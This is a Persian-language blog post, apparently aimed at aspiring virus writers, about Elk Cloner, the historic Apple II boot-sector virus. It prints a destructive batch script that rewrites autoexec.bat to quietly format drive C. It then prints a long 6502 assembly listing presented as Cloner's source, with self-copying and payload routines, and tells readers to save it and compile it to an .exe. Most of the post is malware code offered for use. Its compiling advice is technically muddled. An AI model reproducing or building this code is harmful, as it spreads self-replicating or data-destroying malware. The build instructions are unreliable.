کدهای ویروس کلونر :: کدهای خط خطی

کدهای خط خطی

کدهای خط خطی

آدم ها 10 دسته اند:
01- آنهایی که باینری نمی فهمند...
10- آنهایی که باینری می فهمند...

دنبال کنندگان ۲ نفر
این وبلاگ را دنبال کنید

به درخواست بعضی از دوستان و بخاطر وجود ابهامات بین تازه واردا امروز میخوایم درباره ویروس کلونر بحث کنیم

ویروس کلونر Elk Cloner اولین ویروسی بود که توسط یه نوجوان 15 ساله امریکایی با سیستم عامل اپل برای بازی ها و سرگرمی نوشته شد

از طریق فلاپی به سیستم های دیگر منتقل میشد و در هر 50 بار روشن شدن سیستم یکبار پیامی نمایش میداد ولی هیچ آسیب جدی به هیچ سیستمی وارد نمیکرد

به این نوع ویروس ها ویروس بخش بوت هم میگن چون بوت سیستم هارو تحت تاثیر قرار میده

کلونر به زبان اسمبلی نوشته شده که امروزه میتوان سورس اون رو به بقیه زبان ها هم ترجمه کرد.

بیشتر دوستان و علاقمندان به ویروس نویسی فکر میکنن کد زیر که با bat نوشته شده ویروس کلونر هستش

@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format /autotest c:/q>nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
exit

که این کدها هیچ ربطی به این نوع ویروس نداره و حتی احتمال عمل کردن این کد تقریبا صفر درصده.

کد بالا دستور پاک کردن و مخفی کردن فایل های درایو سی رو میده درحالی که کلونر هیچ فایلی رو پاک نمیکنه!!!

همونطور که گفتم کلونر با زبان اسمبلی نوشته شده (نه bat) که سورس اون به شکل زیر هست

    ORG $9000
VERSN  DFB $02 
HIMEM  LDA #$FF
    STA $4C
    LDA #$8F
    STA $4D
DOPTCH LDA #$20 
    STA $A180 
    LDA #$5B 
    STA $A181 
    LDA #$A7 
    STA $A182 
RUNPTCH LDA #$AD
    STA $A4D1
    LDA #$B6
    STA $A4D2
    LDA #$AA
    STA $A4D3
LODPTCH LDA #$4C
    STA $A413 
    LDA #>LOD
    STA $A414 
    LDA #<LOD
    STA $A415 
BLDPTCH LDA #$4C
    STA $A35D
    LDA #>BLOD
    STA $A35E
    LDA #<BLOD
    STA $A35F
CATPTCH LDA #$4C
    STA $A56E
    LDA #>CATALOG 
    STA $A56F
    LDA #<CATALOG
    STA $A570
USRPTCH LDA #$4C
    STA $0A
    LDA #>USRCMD 
    STA $0B
    LDA #<USRCMD 
    STA $0C
BOOTUP CLD
    JSR READ 
    LDX $B3BF
    INX
    STX $B3BF
    JSR WRITE 
    JSR DESTROY
    JMP $A180 
TESTON LDA #$00
    STA FLAG1
    LDA $AA68
    STA $B7EA
    JSR READ
    LDA $B3C2 
    CMP VERSN 
    BEQ TESTON1 
    LDA #$01
    STA FLAG1
TESTON1 RTS
LOD   JSR TESTON
    LDA FLAG1
    CMP #$00
    BEQ LOD1
    JSR CLONE
LOD1  JSR $A316
    JMP $A416
BLOD  JSR TESTON
    LDA FLAG1
    CMP #$00
    BEQ BLOD1
    JSR CLONE
BLOD1  JSR $A2A8
    JMP $A360
CATALOG JSR TESTON
    LDA #$06
    JSR $A2AA
    LDA $B5BF
    STA $AA66
    LDA FLAG1
    CMP #$00
    BEQ RETURN
    JSR CLONE
RETURN LDA #$0
    STA $B3BE
    STA $B3BF
    STA $B3C0
    RTS
CLONE  CLC
    JSR READ 
    LDA IDENT
    STA $B3C0
    LDA VERSN 
    STA $B3C2 
    JSR WRITE 
    LDA $AA68
    STA $B7EA
    LDA #$02
    STA $B7F4
    STA $B7EC
    LDA #$08
    STA $B7ED
    LDA #$0
    STA $B7EB
    STA $B7F0
    LDA #$95
    STA $B7F1
CLONE1 LDA #$B7
    LDY #$E8
    JSR $B7B5
    CLD
    BCC CLONE2
    RTS 
CLONE2 DEC $B7ED
    DEC $B7F1
    LDA $B7F1
    CMP #$8F
    BNE CLONE1
    LDA #$02
    STA $B7F1
    LDA #$01
    STA $B7F4
    STA $B7EC
    LDA #$0 
    STA $B7ED
    LDA #$B7
    LDY #$E8
    JSR $B7B5
    CLD
    BCC CLONE3
    RTS 
CLONE3 LDA #$4C
    STA $280 
    LDA #$00
    STA $281 
    LDA #$9B
    STA $282 
    LDA #$02
    STA $B7F4
    LDA #$B7
    LDY #$E8
    JSR $B7B5
    CLD
    BCC CLONE4
    RTS 
CLONE4 LDA #$0
    STA $B7EC
    LDA #$A
    STA $B7ED
    LDA #$95
    STA $B7F1
    LDA #$B7
    LDY #$E8
    JSR $B7B5
    CLD 
    RTS
READ  LDA #$01
    STA $B7F4
    JMP VTOC
WRITE  LDA #$02
    STA $B7F4
VTOC  LDA #$11
    STA $B7EC
    LDA #$0
    STA $B7ED
    LDA #$BB 
    STA $B7F0
    LDA #$B3
    STA $B7F1
    LDA #$0
    STA $B7EB
    LDA #$B7
    LDY #$E8
    JSR $B7B5
    CLD 
    RTS
PRINT  STY $FC
    STA $FD
    LDY #$00
PRINT0 LDA ($FC),Y 
    CMP #$00
    BEQ PRINT1
    JSR $FDED
    INY 
    JMP PRINT0
PRINT1 RTS
PRTMSG LDY #>MSG
    LDA #<MSG
    JSR PRINT
PRTNUM LDA IDENT
    STA $44
    JSR $AE42
    LDA #$8D
    JSR $FDED
    RTS
MSG   ASC 'ELK CLONER V2.0 # '
    DFB $0
IDENT  DFB $1
FLAG1  DFB $00
RET   RTS
USRCMD JSR $E6FB
    CPX #$0B 
    BNE CMD2
    JSR PRTMSG
    RTS
CMD2  CPX #$0C 
    BNE CMD3
    LDY #>REPORT
    LDA #<REPORT
    JSR PRINT
    JSR READ 
    LDA $B3BF
    STA $44
    JSR $AE42
    LDA #$8D
    JSR $FDED
    RTS
CMD3  CPX #$0D 
    BNE CMD4
    JSR CLONE
    RTS
CMD4  CPX #$0A
    BNE USRERR
    JSR PRPOEM
    RTS
USRERR LDY #>UERR
    LDA #<UERR
    JSR PRINT
    JSR $FBDD
    JMP $9DBF
UERR  DFB $8D 
    ASC 'ILLEGAL QUANTITY ERROR'
    DFB $0
PRPOEM JSR $FC58
    LDY #>POEM
    LDA #<POEM
    JSR PRINT
    RTS
REPORT ASC 'BOOT COUNT: ' 
    DFB $0 
POEM  ASC 'ELK CLONER:'
    DFB $8D,$8D 
    ASC '  THE PROGRAM WITH A PERSONALITY'
    DFB $8D,$8D,$8D 
    ASC 'IT WILL GET ON ALL YOUR DISKS'
    DFB $8D
    ASC 'IT WILL INFILTRATE YOUR CHIPS'
    DFB $8D
    ASC 'YES IT'
    DFB $A7
    ASC 'S CLONER!'
    DFB $8D,$8D
    ASC 'IT WILL STICK TO YOU LIKE GLUE'
    DFB $8D
    ASC 'IT WILL MODIFY RAM TOO'
    DFB $8D
    ASC 'SEND IN THE CLONER!'
    DFB $8D,$8D,$8D,$8D,$0 
IOERR  LDY #>ERRMSG
    LDA #<ERRMSG
    JSR PRINT
    JSR $FBDD 
    JMP $9DBF 
ERRMSG DFB $8D,$8D 
    ASC 'I/O ERROR'
    DFB $8D,$00 
DESTROY LDA $B3BF
    CMP #10 
    BNE DEST1
    LDA #$69 
    STA $3F2
    LDA #$FF 
    STA $3F3
    JSR $FB6F
    RTS
DEST1  CMP #15 
    BNE DEST2
    LDA #$3F
    STA $32
    RTS
DEST2  CMP #20 
    BNE DEST3
    LDA $C030
    LDA $C030
    LDA $C030
    RTS
DEST3  CMP #25 
    BNE DEST4
    LDA #$7F
    STA $32
    RTS
DEST4  CMP #30 
    BNE DEST5
    LDA #'I'
    STA $B3A7
    LDA #'T'
    STA $B3A8
    LDA #'B'
    STA $B3A9
    LDA #'A'
    STA $B3AA 
    RTS
DEST5  CMP #35 
    BNE DEST6
    LDA #$85
    STA $AAB2
    RTS
DEST6  CMP #40 
    BNE DEST7
    LDA #$00
    STA $3F2
    LDA #$03
    STA $3F3
    JSR $FB6F
    LDA #$4C
    STA $300
    LDA #$00
    STA $301
    LDA #$03
    STA $302
    RTS
DEST7  CMP #45 
    BNE DEST8
    LDA #$80
    STA $D6
    RTS
DEST8  CMP #50 
    BNE DEST9
    LDA #>PRPOEM
    STA $3F2
    LDA #<PRPOEM
    STA $3F3
    JSR $FB6F
    RTS
DEST9  CMP #55 
    BNE DEST10
    LDA #$FF
    STA $BDD3
    RTS
DEST10 CMP #60 
    BNE DEST11
    LDA #$20
    STA $BDD3
    RTS
DEST11 CMP #65 
    BNE DEST12
    LDA #$4C
    STA $A180
    LDA #$69
    STA $A181
    LDA #$FF
    STA $A182
    RTS
DEST12 CMP #70 
    BNE DEST13
    LDA #$10
    STA $BDD3
    RTS
DEST13 CMP #75 
    BNE DEST14
    JMP $C600
DEST14 CMP #76 
    BNE DEST15 
    JMP $C600
DEST15 CMP #77 
    BNE DEST16
    JMP $C600
DEST16 CMP #78 
    BNE DEST17
    JMP $C600
DEST17 CMP #79 
    BNE DEST18
    JSR READ 
    LDA #$00
    STA $B3BF
    JSR WRITE 
    RTS
DEST18 RTS
LOADER ORG $9500
    LDA #$02 
    STA $B7EC 
    LDA #$01 
    STA $B7F4 
    LDA #$03
    STA $B7ED
    LDA #$0
    STA $B7EB
    STA $B7F0
    LDA #$90
    STA $B7F1
LOAD1  LDA #$B7
    LDY #$E8
    JSR $B7B5
    INC $B7ED
    INC $B7F1
    LDA $B7F1
    CMP #$96
    BCC LOAD1
    JMP HIMEM 

کدهای بالا رو فعلا با فرمت asm ذخیره کنید تا کامپایل کردن اسمبلی رو تو یه پست جدید آموزش بدم

اگه صبر و طاقتتون جواب نداد میتونید خودتون تو نت کامپایل کردن این کدها و تبدیل اونها به exe رو جستوجوکنید

شما ابتدا باید سعی کنید فایل asm رو به obj تبدیل کنید و بعد از اون به exe تبدیل میشه.

نظرات  (۰)

هیچ نظری هنوز ثبت نشده است

ارسال نظر

ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی